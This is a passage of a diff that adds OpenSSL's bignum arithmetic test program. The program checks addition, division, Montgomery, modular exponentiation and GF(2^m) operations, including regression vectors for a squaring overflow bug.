+    out = BIO_new(BIO_s_file());
+    if (out == NULL)
+        EXIT(1);
+    if (outfile == NULL) {
+        BIO_set_fp(out, stdout, BIO_NOCLOSE);
+    } else {
+        if (!BIO_write_filename(out, outfile)) {
+            perror(outfile);
+            EXIT(1);
+        }
+    }
+
+    if (!results)
+        BIO_puts(out, "obase=16\nibase=16\n");
+
+    message(out, "BN_add");
+    if (!test_add(out))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_sub");
+    if (!test_sub(out))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_lshift1");
+    if (!test_lshift1(out))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_lshift (fixed)");
+    if (!test_lshift(out, ctx, BN_bin2bn(lst, sizeof(lst) - 1, NULL)))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_lshift");
+    if (!test_lshift(out, ctx, NULL))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_rshift1");
+    if (!test_rshift1(out))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_rshift");
+    if (!test_rshift(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_sqr");
+    if (!test_sqr(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_mul");
+    if (!test_mul(out))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_div");
+    if (!test_div(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_div_word");
+    if (!test_div_word(out))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_div_recp");
+    if (!test_div_recp(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_mod");
+    if (!test_mod(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_mod_mul");
+    if (!test_mod_mul(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_mont");
+    if (!test_mont(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_mod_exp");
+    if (!test_mod_exp(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_mod_exp_mont_consttime");
+    if (!test_mod_exp_mont_consttime(out, ctx))
+        goto err;
+    if (!test_mod_exp_mont5(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_exp");
+    if (!test_exp(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_kronecker");
+    if (!test_kron(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_mod_sqrt");
+    if (!test_sqrt(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+#ifndef OPENSSL_NO_EC2M
+    message(out, "BN_GF2m_add");
+    if (!test_gf2m_add(out))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_GF2m_mod");
+    if (!test_gf2m_mod(out))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_GF2m_mod_mul");
+    if (!test_gf2m_mod_mul(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_GF2m_mod_sqr");
+    if (!test_gf2m_mod_sqr(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_GF2m_mod_inv");
+    if (!test_gf2m_mod_inv(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_GF2m_mod_div");
+    if (!test_gf2m_mod_div(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_GF2m_mod_exp");
+    if (!test_gf2m_mod_exp(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_GF2m_mod_sqrt");
+    if (!test_gf2m_mod_sqrt(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+
+    message(out, "BN_GF2m_mod_solve_quad");
+    if (!test_gf2m_mod_solve_quad(out, ctx))
+        goto err;
+    (void)BIO_flush(out);
+#endif
+    BN_CTX_free(ctx);
+    BIO_free(out);
+
+    EXIT(0);
+ err:
+    BIO_puts(out, "1\n");       /* make sure the Perl script fed by bc
+                                 * notices the failure, see test_bn in
+                                 * test/Makefile.ssl */
+    (void)BIO_flush(out);
+    ERR_load_crypto_strings();
+    ERR_print_errors_fp(stderr);
+    EXIT(1);
+    return (1);
+}
+
+int test_add(BIO *bp)
+{
+    BIGNUM a, b, c;
+    int i;
+
+    BN_init(&a);
+    BN_init(&b);
+    BN_init(&c);
+
+    BN_bntest_rand(&a, 512, 0, 0);
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(&b, 450 + i, 0, 0);
+        a.neg = rand_neg();
+        b.neg = rand_neg();
+        BN_add(&c, &a, &b);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " + ");
+                BN_print(bp, &b);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, &c);
+            BIO_puts(bp, "\n");
+        }
+        a.neg = !a.neg;
+        b.neg = !b.neg;
+        BN_add(&c, &c, &b);
+        BN_add(&c, &c, &a);
+        if (!BN_is_zero(&c)) {
+            fprintf(stderr, "Add test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(&a);
+    BN_free(&b);
+    BN_free(&c);
+    return (1);
+}
+
+int test_sub(BIO *bp)
+{
+    BIGNUM a, b, c;
+    int i;
+
+    BN_init(&a);
+    BN_init(&b);
+    BN_init(&c);
+
+    for (i = 0; i < num0 + num1; i++) {
+        if (i < num1) {
+            BN_bntest_rand(&a, 512, 0, 0);
+            BN_copy(&b, &a);
+            if (BN_set_bit(&a, i) == 0)
+                return (0);
+            BN_add_word(&b, i);
+        } else {
+            BN_bntest_rand(&b, 400 + i - num1, 0, 0);
+            a.neg = rand_neg();
+            b.neg = rand_neg();
+        }
+        BN_sub(&c, &a, &b);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " - ");
+                BN_print(bp, &b);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, &c);
+            BIO_puts(bp, "\n");
+        }
+        BN_add(&c, &c, &b);
+        BN_sub(&c, &c, &a);
+        if (!BN_is_zero(&c)) {
+            fprintf(stderr, "Subtract test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(&a);
+    BN_free(&b);
+    BN_free(&c);
+    return (1);
+}
+
+int test_div(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM a, b, c, d, e;
+    int i;
+
+    BN_init(&a);
+    BN_init(&b);
+    BN_init(&c);
+    BN_init(&d);
+    BN_init(&e);
+
+    for (i = 0; i < num0 + num1; i++) {
+        if (i < num1) {
+            BN_bntest_rand(&a, 400, 0, 0);
+            BN_copy(&b, &a);
+            BN_lshift(&a, &a, i);
+            BN_add_word(&a, i);
+        } else
+            BN_bntest_rand(&b, 50 + 3 * (i - num1), 0, 0);
+        a.neg = rand_neg();
+        b.neg = rand_neg();
+        BN_div(&d, &c, &a, &b, ctx);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " / ");
+                BN_print(bp, &b);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, &d);
+            BIO_puts(bp, "\n");
+
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " % ");
+                BN_print(bp, &b);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, &c);
+            BIO_puts(bp, "\n");
+        }
+        BN_mul(&e, &d, &b, ctx);
+        BN_add(&d, &e, &c);
+        BN_sub(&d, &d, &a);
+        if (!BN_is_zero(&d)) {
+            fprintf(stderr, "Division test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(&a);
+    BN_free(&b);
+    BN_free(&c);
+    BN_free(&d);
+    BN_free(&e);
+    return (1);
+}
+
+static void print_word(BIO *bp, BN_ULONG w)
+{
+#ifdef SIXTY_FOUR_BIT
+    if (sizeof(w) > sizeof(unsigned long)) {
+        unsigned long h = (unsigned long)(w >> 32), l = (unsigned long)(w);
+
+        if (h)
+            BIO_printf(bp, "%lX%08lX", h, l);
+        else
+            BIO_printf(bp, "%lX", l);
+        return;
+    }
+#endif
+    BIO_printf(bp, BN_HEX_FMT1, w);
+}
+
+int test_div_word(BIO *bp)
+{
+    BIGNUM a, b;
+    BN_ULONG r, s;
+    int i;
+
+    BN_init(&a);
+    BN_init(&b);
+
+    for (i = 0; i < num0; i++) {
+        do {
+            BN_bntest_rand(&a, 512, -1, 0);
+            BN_bntest_rand(&b, BN_BITS2, -1, 0);
+            s = b.d[0];
+        } while (!s);
+
+        BN_copy(&b, &a);
+        r = BN_div_word(&b, s);
+
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " / ");
+                print_word(bp, s);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, &b);
+            BIO_puts(bp, "\n");
+
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " % ");
+                print_word(bp, s);
+                BIO_puts(bp, " - ");
+            }
+            print_word(bp, r);
+            BIO_puts(bp, "\n");
+        }
+        BN_mul_word(&b, s);
+        BN_add_word(&b, r);
+        BN_sub(&b, &a, &b);
+        if (!BN_is_zero(&b)) {
+            fprintf(stderr, "Division (word) test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(&a);
+    BN_free(&b);
+    return (1);
+}
+
+int test_div_recp(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM a, b, c, d, e;
+    BN_RECP_CTX recp;
+    int i;
+
+    BN_RECP_CTX_init(&recp);
+    BN_init(&a);
+    BN_init(&b);
+    BN_init(&c);
+    BN_init(&d);
+    BN_init(&e);
+
+    for (i = 0; i < num0 + num1; i++) {
+        if (i < num1) {
+            BN_bntest_rand(&a, 400, 0, 0);
+            BN_copy(&b, &a);
+            BN_lshift(&a, &a, i);
+            BN_add_word(&a, i);
+        } else
+            BN_bntest_rand(&b, 50 + 3 * (i - num1), 0, 0);
+        a.neg = rand_neg();
+        b.neg = rand_neg();
+        BN_RECP_CTX_set(&recp, &b, ctx);
+        BN_div_recp(&d, &c, &a, &recp, ctx);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " / ");
+                BN_print(bp, &b);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, &d);
+            BIO_puts(bp, "\n");
+
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " % ");
+                BN_print(bp, &b);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, &c);
+            BIO_puts(bp, "\n");
+        }
+        BN_mul(&e, &d, &b, ctx);
+        BN_add(&d, &e, &c);
+        BN_sub(&d, &d, &a);
+        if (!BN_is_zero(&d)) {
+            fprintf(stderr, "Reciprocal division test failed!\n");
+            fprintf(stderr, "a=");
+            BN_print_fp(stderr, &a);
+            fprintf(stderr, "\nb=");
+            BN_print_fp(stderr, &b);
+            fprintf(stderr, "\n");
+            return 0;
+        }
+    }
+    BN_free(&a);
+    BN_free(&b);
+    BN_free(&c);
+    BN_free(&d);
+    BN_free(&e);
+    BN_RECP_CTX_free(&recp);
+    return (1);
+}
+
+int test_mul(BIO *bp)
+{
+    BIGNUM a, b, c, d, e;
+    int i;
+    BN_CTX *ctx;
+
+    ctx = BN_CTX_new();
+    if (ctx == NULL)
+        EXIT(1);
+
+    BN_init(&a);
+    BN_init(&b);
+    BN_init(&c);
+    BN_init(&d);
+    BN_init(&e);
+
+    for (i = 0; i < num0 + num1; i++) {
+        if (i <= num1) {
+            BN_bntest_rand(&a, 100, 0, 0);
+            BN_bntest_rand(&b, 100, 0, 0);
+        } else
+            BN_bntest_rand(&b, i - num1, 0, 0);
+        a.neg = rand_neg();
+        b.neg = rand_neg();
+        BN_mul(&c, &a, &b, ctx);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " * ");
+                BN_print(bp, &b);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, &c);
+            BIO_puts(bp, "\n");
+        }
+        BN_div(&d, &e, &c, &a, ctx);
+        BN_sub(&d, &d, &b);
+        if (!BN_is_zero(&d) || !BN_is_zero(&e)) {
+            fprintf(stderr, "Multiplication test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(&a);
+    BN_free(&b);
+    BN_free(&c);
+    BN_free(&d);
+    BN_free(&e);
+    BN_CTX_free(ctx);
+    return (1);
+}
+
+int test_sqr(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *c, *d, *e;
+    int i, ret = 0;
+
+    a = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+    if (a == NULL || c == NULL || d == NULL || e == NULL) {
+        goto err;
+    }
+
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(a, 40 + i * 10, 0, 0);
+        a->neg = rand_neg();
+        BN_sqr(c, a, ctx);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, a);
+                BIO_puts(bp, " * ");
+                BN_print(bp, a);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, c);
+            BIO_puts(bp, "\n");
+        }
+        BN_div(d, e, c, a, ctx);
+        BN_sub(d, d, a);
+        if (!BN_is_zero(d) || !BN_is_zero(e)) {
+            fprintf(stderr, "Square test failed!\n");
+            goto err;
+        }
+    }
+
+    /* Regression test for a BN_sqr overflow bug. */
+    BN_hex2bn(&a,
+              "80000000000000008000000000000001"
+              "FFFFFFFFFFFFFFFE0000000000000000");
+    BN_sqr(c, a, ctx);
+    if (bp != NULL) {
+        if (!results) {
+            BN_print(bp, a);
+            BIO_puts(bp, " * ");
+            BN_print(bp, a);
+            BIO_puts(bp, " - ");
+        }
+        BN_print(bp, c);
+        BIO_puts(bp, "\n");
+    }
+    BN_mul(d, a, a, ctx);
+    if (BN_cmp(c, d)) {
+        fprintf(stderr, "Square test failed: BN_sqr and BN_mul produce "
+                "different results!\n");
+        goto err;
+    }
+
+    /* Regression test for a BN_sqr overflow bug. */
+    BN_hex2bn(&a,
+              "80000000000000000000000080000001"
+              "FFFFFFFE000000000000000000000000");
+    BN_sqr(c, a, ctx);
+    if (bp != NULL) {
+        if (!results) {
+            BN_print(bp, a);
+            BIO_puts(bp, " * ");
+            BN_print(bp, a);
+            BIO_puts(bp, " - ");
+        }
+        BN_print(bp, c);
+        BIO_puts(bp, "\n");
+    }
+    BN_mul(d, a, a, ctx);
+    if (BN_cmp(c, d)) {
+        fprintf(stderr, "Square test failed: BN_sqr and BN_mul produce "
+                "different results!\n");
+        goto err;
+    }
+    ret = 1;
+ err:
+    if (a != NULL)
+        BN_free(a);
+    if (c != NULL)
+        BN_free(c);
+    if (d != NULL)
+        BN_free(d);
+    if (e != NULL)
+        BN_free(e);
+    return ret;
+}
+
+int test_mont(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM a, b, c, d, A, B;
+    BIGNUM n;
+    int i;
+    BN_MONT_CTX *mont;
+
+    BN_init(&a);
+    BN_init(&b);
+    BN_init(&c);
+    BN_init(&d);
+    BN_init(&A);
+    BN_init(&B);
+    BN_init(&n);
+
+    mont = BN_MONT_CTX_new();
+    if (mont == NULL)
+        return 0;
+
+    BN_bntest_rand(&a, 100, 0, 0);
+    BN_bntest_rand(&b, 100, 0, 0);
+    for (i = 0; i < num2; i++) {
+        int bits = (200 * (i + 1)) / num2;
+
+        if (bits == 0)
+            continue;
+        BN_bntest_rand(&n, bits, 0, 1);
+        BN_MONT_CTX_set(mont, &n, ctx);
+
+        BN_nnmod(&a, &a, &n, ctx);
+        BN_nnmod(&b, &b, &n, ctx);
+
+        BN_to_montgomery(&A, &a, mont, ctx);
+        BN_to_montgomery(&B, &b, mont, ctx);
+
+        BN_mod_mul_montgomery(&c, &A, &B, mont, ctx);
+        BN_from_montgomery(&A, &c, mont, ctx);
+        if (bp != NULL) {
+            if (!results) {
+#ifdef undef
+                fprintf(stderr, "%d * %d %% %d\n",
+                        BN_num_bits(&a),
+                        BN_num_bits(&b), BN_num_bits(mont->N));
+#endif
+                BN_print(bp, &a);
+                BIO_puts(bp, " * ");
+                BN_print(bp, &b);
+                BIO_puts(bp, " % ");
+                BN_print(bp, &(mont->N));
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, &A);
+            BIO_puts(bp, "\n");
+        }
+        BN_mod_mul(&d, &a, &b, &n, ctx);
+        BN_sub(&d, &d, &A);
+        if (!BN_is_zero(&d)) {
+            fprintf(stderr, "Montgomery multiplication test failed!\n");
+            return 0;
+        }
+    }
+    BN_MONT_CTX_free(mont);
+    BN_free(&a);
+    BN_free(&b);
+    BN_free(&c);
+    BN_free(&d);
+    BN_free(&A);
+    BN_free(&B);
+    BN_free(&n);
+    return (1);
+}
+
+int test_mod(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b, *c, *d, *e;
+    int i;
+
+    a = BN_new();
+    b = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+
+    BN_bntest_rand(a, 1024, 0, 0);
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(b, 450 + i * 10, 0, 0);
+        a->neg = rand_neg();
+        b->neg = rand_neg();
+        BN_mod(c, a, b, ctx);
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, a);
+                BIO_puts(bp, " % ");
+                BN_print(bp, b);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, c);
+            BIO_puts(bp, "\n");
+        }
+        BN_div(d, e, a, b, ctx);
+        BN_sub(e, e, c);
+        if (!BN_is_zero(e)) {
+            fprintf(stderr, "Modulo test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(a);
+    BN_free(b);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    return (1);
+}
+
+int test_mod_mul(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b, *c, *d, *e;
+    int i, j;
+
+    a = BN_new();
+    b = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+
+    for (j = 0; j < 3; j++) {
+        BN_bntest_rand(c, 1024, 0, 0);
+        for (i = 0; i < num0; i++) {
+            BN_bntest_rand(a, 475 + i * 10, 0, 0);
+            BN_bntest_rand(b, 425 + i * 11, 0, 0);
+            a->neg = rand_neg();
+            b->neg = rand_neg();
+            if (!BN_mod_mul(e, a, b, c, ctx)) {
+                unsigned long l;
+
+                while ((l = ERR_get_error()))
+                    fprintf(stderr, "ERROR:%s\n", ERR_error_string(l, NULL));
+                EXIT(1);
+            }
+            if (bp != NULL) {
+                if (!results) {
+                    BN_print(bp, a);
+                    BIO_puts(bp, " * ");
+                    BN_print(bp, b);
+                    BIO_puts(bp, " % ");
+                    BN_print(bp, c);
+                    if ((a->neg ^ b->neg) && !BN_is_zero(e)) {
+                        /*
+                         * If (a*b) % c is negative, c must be added in order
+                         * to obtain the normalized remainder (new with
+                         * OpenSSL 0.9.7, previous versions of BN_mod_mul
+                         * could generate negative results)
+                         */
+                        BIO_puts(bp, " + ");
+                        BN_print(bp, c);
+                    }
+                    BIO_puts(bp, " - ");
+                }
+                BN_print(bp, e);
+                BIO_puts(bp, "\n");
+            }
+            BN_mul(d, a, b, ctx);
+            BN_sub(d, d, e);
+            BN_div(a, b, d, c, ctx);
+            if (!BN_is_zero(b)) {
+                fprintf(stderr, "Modulo multiply test failed!\n");
+                ERR_print_errors_fp(stderr);
+                return 0;
+            }
+        }
+    }
+    BN_free(a);
+    BN_free(b);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    return (1);
+}
+
+int test_mod_exp(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b, *c, *d, *e;
+    int i;
+
+    a = BN_new();
+    b = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+
+    BN_bntest_rand(c, 30, 0, 1); /* must be odd for montgomery */
+    for (i = 0; i < num2; i++) {
+        BN_bntest_rand(a, 20 + i * 5, 0, 0);
+        BN_bntest_rand(b, 2 + i, 0, 0);
+
+        if (!BN_mod_exp(d, a, b, c, ctx))
+            return (0);
+
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, a);
+                BIO_puts(bp, " ^ ");
+                BN_print(bp, b);
+                BIO_puts(bp, " % ");
+                BN_print(bp, c);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, d);
+            BIO_puts(bp, "\n");
+        }
+        BN_exp(e, a, b, ctx);
+        BN_sub(e, e, d);
+        BN_div(a, b, e, c, ctx);
+        if (!BN_is_zero(b)) {
+            fprintf(stderr, "Modulo exponentiation test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(a);
+    BN_free(b);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    return (1);
+}
+
+int test_mod_exp_mont_consttime(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b, *c, *d, *e;
+    int i;
+
+    a = BN_new();
+    b = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+
+    BN_bntest_rand(c, 30, 0, 1); /* must be odd for montgomery */
+    for (i = 0; i < num2; i++) {
+        BN_bntest_rand(a, 20 + i * 5, 0, 0);
+        BN_bntest_rand(b, 2 + i, 0, 0);
+
+        if (!BN_mod_exp_mont_consttime(d, a, b, c, ctx, NULL))
+            return (00);
+
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, a);
+                BIO_puts(bp, " ^ ");
+                BN_print(bp, b);
+                BIO_puts(bp, " % ");
+                BN_print(bp, c);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, d);
+            BIO_puts(bp, "\n");
+        }
+        BN_exp(e, a, b, ctx);
+        BN_sub(e, e, d);
+        BN_div(a, b, e, c, ctx);
+        if (!BN_is_zero(b)) {
+            fprintf(stderr, "Modulo exponentiation test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(a);
+    BN_free(b);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    return (1);
+}
+
+/*
+ * Test constant-time modular exponentiation with 1024-bit inputs, which on
+ * x86_64 cause a different code branch to be taken.
+ */
+int test_mod_exp_mont5(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *p, *m, *d, *e;
+
+    BN_MONT_CTX *mont;
+
+    a = BN_new();
+    p = BN_new();
+    m = BN_new();
+    d = BN_new();
+    e = BN_new();
+
+    mont = BN_MONT_CTX_new();
+
+    BN_bntest_rand(m, 1024, 0, 1); /* must be odd for montgomery */
+    /* Zero exponent */
+    BN_bntest_rand(a, 1024, 0, 0);
+    BN_zero(p);
+    if (!BN_mod_exp_mont_consttime(d, a, p, m, ctx, NULL))
+        return 0;
+    if (!BN_is_one(d)) {
+        fprintf(stderr, "Modular exponentiation test failed!\n");
+        return 0;
+    }
+    /* Zero input */
+    BN_bntest_rand(p, 1024, 0, 0);
+    BN_zero(a);
+    if (!BN_mod_exp_mont_consttime(d, a, p, m, ctx, NULL))
+        return 0;
+    if (!BN_is_zero(d)) {
+        fprintf(stderr, "Modular exponentiation test failed!\n");
+        return 0;
+    }
+    /*
+     * Craft an input whose Montgomery representation is 1, i.e., shorter
+     * than the modulus m, in order to test the const time precomputation
+     * scattering/gathering.
+     */
+    BN_one(a);
+    BN_MONT_CTX_set(mont, m, ctx);
+    if (!BN_from_montgomery(e, a, mont, ctx))
+        return 0;
+    if (!BN_mod_exp_mont_consttime(d, e, p, m, ctx, NULL))
+        return 0;
+    if (!BN_mod_exp_simple(a, e, p, m, ctx))
+        return 0;
+    if (BN_cmp(a, d) != 0) {
+        fprintf(stderr, "Modular exponentiation test failed!\n");
+        return 0;
+    }
+    /* Finally, some regular test vectors. */
+    BN_bntest_rand(e, 1024, 0, 0);
+    if (!BN_mod_exp_mont_consttime(d, e, p, m, ctx, NULL))
+        return 0;
+    if (!BN_mod_exp_simple(a, e, p, m, ctx))
+        return 0;
+    if (BN_cmp(a, d) != 0) {
+        fprintf(stderr, "Modular exponentiation test failed!\n");
+        return 0;
+    }
+    BN_free(a);
+    BN_free(p);
+    BN_free(m);
+    BN_free(d);
+    BN_free(e);
+    return (1);
+}
+
+int test_exp(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b, *d, *e, *one;
+    int i;
+
+    a = BN_new();
+    b = BN_new();
+    d = BN_new();
+    e = BN_new();
+    one = BN_new();
+    BN_one(one);
+
+    for (i = 0; i < num2; i++) {
+        BN_bntest_rand(a, 20 + i * 5, 0, 0);
+        BN_bntest_rand(b, 2 + i, 0, 0);
+
+        if (BN_exp(d, a, b, ctx) <= 0)
+            return (0);
+
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, a);
+                BIO_puts(bp, " ^ ");
+                BN_print(bp, b);
+                BIO_puts(bp, " - ");
+            }
+            BN_print(bp, d);
+            BIO_puts(bp, "\n");
+        }
+        BN_one(e);
+        for (; !BN_is_zero(b); BN_sub(b, b, one))
+            BN_mul(e, e, a, ctx);
+        BN_sub(e, e, d);
+        if (!BN_is_zero(e)) {
+            fprintf(stderr, "Exponentiation test failed!\n");
+            return 0;
+        }
+    }
+    BN_free(a);
+    BN_free(b);
+    BN_free(d);
+    BN_free(e);
+    BN_free(one);
+    return (1);
+}
+
+#ifndef OPENSSL_NO_EC2M
+int test_gf2m_add(BIO *bp)
+{
+    BIGNUM a, b, c;
+    int i, ret = 0;
+
+    BN_init(&a);
+    BN_init(&b);
+    BN_init(&c);
+
+    for (i = 0; i < num0; i++) {
+        BN_rand(&a, 512, 0, 0);
+        BN_copy(&b, BN_value_one());
+        a.neg = rand_neg();
+        b.neg = rand_neg();
+        BN_GF2m_add(&c, &a, &b);
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+        if (bp != NULL) {
+            if (!results) {
+                BN_print(bp, &a);
+                BIO_puts(bp, " ^ ");
+                BN_print(bp, &b);
+                BIO_puts(bp, " = ");
+            }
+            BN_print(bp, &c);
+            BIO_puts(bp, "\n");
+        }
+# endif
+        /* Test that two added values have the correct parity. */
+        if ((BN_is_odd(&a) && BN_is_odd(&c))
+            || (!BN_is_odd(&a) && !BN_is_odd(&c))) {
+            fprintf(stderr, "GF(2^m) addition test (a) failed!\n");
+            goto err;
+        }
+        BN_GF2m_add(&c, &c, &c);
+        /* Test that c + c = 0. */
+        if (!BN_is_zero(&c)) {
+            fprintf(stderr, "GF(2^m) addition test (b) failed!\n");
+            goto err;
+        }
+    }
+    ret = 1;
+ err:
+    BN_free(&a);
+    BN_free(&b);
+    BN_free(&c);
+    return ret;
+}
+
+int test_gf2m_mod(BIO *bp)
+{
+    BIGNUM *a, *b[2], *c, *d, *e;
+    int i, j, ret = 0;
+    int p0[] = { 163, 7, 6, 3, 0, -1 };
+    int p1[] = { 193, 15, 0, -1 };
+
+    a = BN_new();
+    b[0] = BN_new();
+    b[1] = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+
+    BN_GF2m_arr2poly(p0, b[0]);
+    BN_GF2m_arr2poly(p1, b[1]);
+
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(a, 1024, 0, 0);
+        for (j = 0; j < 2; j++) {
+            BN_GF2m_mod(c, a, b[j]);
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+            if (bp != NULL) {
+                if (!results) {
+                    BN_print(bp, a);
+                    BIO_puts(bp, " % ");
+                    BN_print(bp, b[j]);
+                    BIO_puts(bp, " - ");
+                    BN_print(bp, c);
+                    BIO_puts(bp, "\n");
+                }
+            }
+# endif
+            BN_GF2m_add(d, a, c);
+            BN_GF2m_mod(e, d, b[j]);
+            /* Test that a + (a mod p) mod p == 0. */
+            if (!BN_is_zero(e)) {
+                fprintf(stderr, "GF(2^m) modulo test failed!\n");
+                goto err;
+            }
+        }
+    }
+    ret = 1;
+ err:
+    BN_free(a);
+    BN_free(b[0]);
+    BN_free(b[1]);
+    BN_free(c);
+    BN_free(d);
+    BN_free(e);
+    return ret;
+}
+
+int test_gf2m_mod_mul(BIO *bp, BN_CTX *ctx)
+{
+    BIGNUM *a, *b[2], *c, *d, *e, *f, *g, *h;
+    int i, j, ret = 0;
+    int p0[] = { 163, 7, 6, 3, 0, -1 };
+    int p1[] = { 193, 15, 0, -1 };
+
+    a = BN_new();
+    b[0] = BN_new();
+    b[1] = BN_new();
+    c = BN_new();
+    d = BN_new();
+    e = BN_new();
+    f = BN_new();
+    g = BN_new();
+    h = BN_new();
+
+    BN_GF2m_arr2poly(p0, b[0]);
+    BN_GF2m_arr2poly(p1, b[1]);
+
+    for (i = 0; i < num0; i++) {
+        BN_bntest_rand(a, 1024, 0, 0);
+        BN_bntest_rand(c, 1024, 0, 0);
+        BN_bntest_rand(d, 1024, 0, 0);
+        for (j = 0; j < 2; j++) {
+            BN_GF2m_mod_mul(e, a, c, b[j], ctx);
+# if 0                          /* make test uses ouput in bc but bc can't
+                                 * handle GF(2^m) arithmetic */
+            if (bp != NULL) {
+                if (!results) {
+                    BN_print(bp, a);
+                    BIO_puts(bp, " * ");
+                    BN_print(bp, c);
+                    BIO_puts(bp, " % ");
+                    BN_print(bp, b[j]);
+                    BIO_puts(bp, " - ");
+                    BN_print(bp, e);
+                    BIO_puts(bp, "\n");
+                }
+            }
+# endif
+            BN_GF2m_add(f, a, d);
+            BN_GF2m_mod_mul(g, f, c, b[j], ctx);
+            BN_GF2m_mod_mul(h, d, c, b[j], ctx);
+            BN_GF2m_add(f, e, g);
+            BN_GF2m_add(f, f, h);
+            /* Test that (a+d)*c = a*c + d*c. */
+            if (!BN_is_zero(f)) {
+                fprintf(stderr,
+                        "GF(2^m) modular multiplication test failed!\n");
+                goto err;
+            }
+        }
+    }
+    ret = 1;
